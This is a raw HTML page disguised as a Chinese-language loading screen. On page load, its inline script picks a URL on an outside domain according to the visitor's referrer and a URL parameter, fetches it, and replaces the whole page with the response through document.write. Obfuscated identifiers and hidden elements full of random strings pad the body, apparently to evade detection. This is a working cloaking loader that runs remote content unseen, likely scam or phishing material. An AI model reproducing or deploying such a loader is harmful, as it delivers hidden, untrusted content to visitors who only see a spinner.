<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .aoOinBcb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .aoOinBcb .voWF9m {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .aoOinBcb .content {
            line-height: 50px;
            text-align: center
        }

        .aoOinBcb .img {
            width: 100%
        }

        .aoOinBcb .kvzbBpwMpsU {
            text-align: center
        }

        .aoOinBcb .kvzbBpwMpsU span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .aoOinBcb .kvzbBpwMpsU span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .aoOinBcb .kvzbBpwMpsU span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .aoOinBcb .kvzbBpwMpsU span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .aoOinBcb .kvzbBpwMpsU span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .aoOinBcb .kvzbBpwMpsU span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .aoOinBcb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function o5PjZmmhdiDi(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WFq2H = o5PjZmmhdiDi('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WFq2H +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WFq2H +".html?a=share";
		}
		
        rrDE9Ir=url+"#"+new Date().getTime();
        rrDE9Ir && function() {
            $.get(rrDE9Ir, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >OyWKKYYWoQgKXzsnxtJlIJa8ck5ygU57q4WD8WaUtxJ2</ul>
<ul style='display:none' >OyWKKYYWoQgKXzsnxtJlIJa8ck5ygU57q4WD8WaUtxJ2</ul>
<a  href='#' style='display:none'>pCKchvqOnBCQ940uOPmXW5gg1zbrHpXrzkw89pj</a>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >DHmMyOxPoxfEXZOUZWdGRqP3Nf59jUZF2onwnvlAsHwAKY3Ywg182b0wVrgVvDhdCvTkinTUkNV3quDjIutJ3RQKgU</h1>
<img  src='' style='display:none'>
<p  style='display:none'>MhBvCRsWjIQquB4ox1</p><div class="aoOinBcb">
    <div class="voWF9m">
        <div class="kvzbBpwMpsU">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >pa3EbV1UJ1PBsxoy0xiJ9QAg0Wr4N4yqiKHVJPS</b>
<b style='display:none' >pa3EbV1UJ1PBsxoy0xiJ9QAg0Wr4N4yqiKHVJPS</b>
<b style='display:none' >pa3EbV1UJ1PBsxoy0xiJ9QAg0Wr4N4yqiKHVJPS</b>
<img  src='' style='display:none'>
<div style='display:none'>AJf1JtnAZOLtLps3wYNN</div>
<p  style='display:none'>ekprKoM8SLMINJJzuqEcRHdAOkOxlVroiUBHZn5ERVOFesVe37vLUJyTMTfk5nv32Oi0bFcDDXqMhHj0KSATbrmCfhaNzuk1w</p>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>